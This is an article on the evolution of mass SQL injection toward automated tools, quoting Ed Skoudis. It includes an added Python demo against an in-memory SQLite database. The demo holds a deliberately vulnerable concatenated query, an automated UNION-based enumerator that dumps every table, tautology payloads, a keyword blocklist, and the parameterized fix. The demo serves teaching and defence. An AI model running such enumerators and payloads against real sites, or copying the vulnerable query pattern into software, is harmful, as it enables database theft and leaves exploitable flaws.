Mass SQL Injection's Evolution

<a href="http://www.f-secure.com/weblog/archives/00001427.html">Mass SQL Injection</a> is like a bad cold. It probably won't kill you, but it comes with a cough, a headache, a stuffy nose and a sore throat. It's also the next most dangerous attack vector on Ed Skoudis's list. It resides there because of its evolution.

In the beginning, SQL injection meant an attacker manually crafting queries for a back-end database and injecting them through a vulnerable Web application. The attacker would send a slew of probes to determine the type of database and its structure and, only then, extract or update the data. That is no longer how it works.

"Now, these attacks are often accomplished using automated tools that iterate through queries, determining the database type, structure, and extracting (or updating data), all done by software with very little human interaction," Skoudis said.

So, what's next? According to Skoudis, point and click hacking of SQL databases through vulnerable Web applications. "The intelligence can be put into software that can essentially extract the database's brain with the attacker having to do little other than choose the given website to attack," added Skoudis.

As I've analyzed and reported Skoudis's attack list, I've looked closely for clues on whether the defense or the offense is winning. By almost all accounts, the offense has the momentum. The same can be said for Mass SQL Injection, where the only automated security responses are Web application firewalls with filtering capabilities and automated scanning tools that help the good guys fix flaws in the code before the bad guys find them. These are promising solutions, but they aren't sufficient for the rapid pace of evolving attacks. A big reason the offense overshadows them is that attacks are more aligned and coordinated with other attacks than defensive tools are with other tools.
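As an added illustration (not code from the original post, from F-Secure or from Skoudis), the following Python script models the automated workflow described above against an in-memory SQLite database: a deliberately vulnerable lookup that concatenates input into SQL, an enumerator that fingerprints the engine, lists tables and columns and dumps every row without a single hand-written query, a keyword blocklist of the kind a filtering Web application firewall applies, and the parameterized lookup that closes the hole. The schema, rows, payloads and function names are all constructed for the demonstration.

```python
"""Added example (not part of the original post): a SQLite model of the
automated injection workflow the article describes, a keyword blocklist
of the sort a filtering WAF applies, and the parameterized query that
fixes the flaw. Schema, data, function names and payloads are all
constructed for the demo."""
import re
import sqlite3

# Constructed sample schema and rows; nothing here comes from the page.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT);
CREATE TABLE comments (id INTEGER PRIMARY KEY, body TEXT);
INSERT INTO users (name, email) VALUES ('alice', 'alice@example.com');
INSERT INTO users (name, email) VALUES ('bob', 'bob@example.com');
INSERT INTO comments (body) VALUES ('first post');
INSERT INTO comments (body) VALUES ('second post');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, name):
    """Deliberately vulnerable: user input is concatenated into the SQL."""
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, name):
    """Hardened: the value travels separately from the statement text."""
    sql = "SELECT name, email FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def enumerate_db(query):
    """Automated UNION-based enumeration: fingerprint the engine, list the
    tables, list each table's columns, then dump every row. `query` is any
    callable that returns rows for an attacker-controlled string; once the
    entry point is known, no query is written by hand."""
    # The lookup returns two columns, so every injected SELECT supplies two.
    # The legitimate WHERE matches nothing, so only injected rows come back.
    dbms = query("' UNION SELECT 'sqlite', sqlite_version() --")[0][0]
    tables = sorted(r[0] for r in query(
        "' UNION SELECT name, NULL FROM sqlite_master WHERE type='table' --"))
    dump = {}
    for table in tables:
        # pragma_table_info() is SQLite's column catalogue (3.16+).
        cols = [r[0] for r in sorted(query(
            "' UNION SELECT name, cid FROM pragma_table_info('%s') --" % table),
            key=lambda r: r[1])]
        joined = " || '|' || ".join("ifnull(%s, '')" % c for c in cols)
        rows = sorted(r[1] for r in query(
            "' UNION SELECT 'row', %s FROM %s --" % (joined, table)))
        dump[table] = {"columns": cols, "rows": rows}
    return {"dbms": dbms, "tables": dump}


# A keyword blocklist of the sort a filtering WAF applies to request input.
BLOCKED = re.compile(r"\b(union|select|insert|update|delete|drop)\b", re.I)


def filter_blocks(value):
    """True if the blocklist would reject this input."""
    return BLOCKED.search(value) is not None


def demo():
    conn = make_db()
    loot = enumerate_db(lambda s: lookup_vulnerable(conn, s))
    # The blocklist catches the UNION payloads used above ...
    union_caught = filter_blocks("' UNION SELECT name, NULL FROM sqlite_master --")
    # ... but not a tautology, which the vulnerable lookup still honours.
    tautology = "' OR 1=1 --"
    leaked = [] if filter_blocks(tautology) else lookup_vulnerable(conn, tautology)
    safe = lookup_parameterized(conn, tautology)
    return loot, union_caught, leaked, safe


if __name__ == "__main__":
    for item in demo():
        print(item)
```

The blocklist stops the UNION payloads but waves through a tautology that still dumps every user, which is the point of the paragraph above: a filter enumerates the attacks someone already thought of, while the parameterized lookup makes the input inert whatever the payload. Engines that accept stacked statements also let the same entry point modify data, which this single-statement example does not show.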

"The bad guys are combining their Web app, network and wireless skills to completely dominate target organizations," said Skoudis. "If pen testers are going to keep up with the attack vectors used by bad guys, they need to combine these vectors as well."

The end goal of any Mass SQL Injection attack is to use the compromised site to push malware into visitors' browsers. The infected machines are then herded into botnets that harvest credit card numbers and other data. Organized crime is a serious perpetrator of this kind of attack, a scary reminder of just how much money and dedication are behind it. It's a war we're losing, a war that can't be won without a lot of ingenuity and vision. In the coming weeks, I plan to seek out some of those companies or individuals who might possess those attributes. To find the right answers, we'll have to look at the wrong ones. Or, find those that are making an impact and ask why.